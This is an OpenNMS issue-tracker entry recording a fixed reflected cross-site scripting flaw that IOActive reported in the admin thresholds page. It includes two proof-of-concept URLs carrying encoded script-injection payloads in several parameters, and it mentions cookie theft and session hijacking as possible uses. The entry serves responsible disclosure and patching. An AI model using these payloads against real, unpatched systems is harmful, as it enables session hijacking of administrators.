[NMS-9674] IOActive: Reflected Cross-site Scripting in admin/thresholds/index.htm filterField and Other Parameters - The OpenNMS Issue Tracker

XML

Word

Printable

Details

Type: Bug
Status: Resolved (View Workflow)
Priority: Major
Resolution: Fixed
Affects Version/s: 20.1.0
Fix Version/s: 21.0.2, Meridian-2016.1.10, Meridian-2017.1.3
Component/s: Web UI - Admin
Security Level: Default (Default Security Scheme)
Labels:
- admin
- security
- web

Sprint:
Horizon - November 8th, Horizon - November 15th

Description

Impact

The application is vulnerable to reflected cross-site scripting (XSS). The requested data, which contains JavaScript code, is reflected in the response.

Background

OpenNMS is a carrier-grade, highly integrated, open source platform designed for building network monitoring solutions. There are two distributions of OpenNMS: Meridian and Horizon. Using Meridian is advisable for enterprises and businesses looking for stability and long term support. Horizon is the place where innovation happens quickly and is ideal for monitoring new technologies and IT ecosystems. Both distributions are completely open source.sdfootnote1sym

Technical Details

Attackers could trick users into following a link or navigating to a page that posts a malicious JavaScript statement to the vulnerable site, causing the malicious JavaScript to be rendered by the site and executed by the victim client. The JavaScript code could be used for several purposes including stealing user cookies or as a second step to hijacking a user's session. Another attack plan could include the possibility of inserting HTML instead

of JavaScript to change/modify the contents of the vulnerable page, which could be used to trick the client.

The XSS happens in the filterField, filterRegexp, triggeredUEI, trigger, and other parameters of the /opennms/admin/thresholds/index.htm script. The following strings could be used to trigger XSS in a web browser (e.g. Firefox):

https://<OpenNMSHost>:9443/opennms/admin/thresholds/index.htm?finishThresholdEdit=1&thresholdIndex=0&groupName=cisco&isNew=&filterSelected=&type=high&dsName=avgBusy5&dsType=node&dsLabel=&value=80.0&rearm=50.0&trigger=3&description=Trigger+an+alert+when+the+five+minute+exponentially-decayed+moving+average+of+the+CPU+busy+percentage+metric+on+a+Cisco+device+reaches+or+goes+above+80%25+for+three+measurement+intervals&triggeredUEI=&rearmedUEI=&filterOperator=or&filterField=%22%27%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E&filterRegexp=%22%27%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E&submitAction=Add

https://<OpenNMSHost>:9443/opennms/admin/thresholds/index.htm?finishThresholdEdit=1&thresholdIndex=0&groupName=cisco&isNew=&filterSelected=&type=high&dsName=avgBusy5&dsType=node&dsLabel=&value=80.0&rearm=50.0&trigger=3&description=%22%27%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&triggeredUEI=%22%27%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&rearmedUEI=%22%27%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&submitAction=Save&filterOperator=or&filterField=&filterRegexp=

Proof of concept screenshot:

(Javascript popup containing string 123)

Timeline

Oct 4, 2017: Researchers discovers vulnerability

Oct XX, 2017: IOActive contacts the vendor

Attachments

Activity

People

Assignee:: Jesse White

Reporter:: Jeff Gehlbach

Votes:: 0 Vote for this issue

Watchers:: 1 Start watching this issue

Dates

Created:: 06/Oct/17 2:44 PM

Updated:: 21/Dec/17 3:39 PM

Resolved:: 17/Nov/17 2:59 AM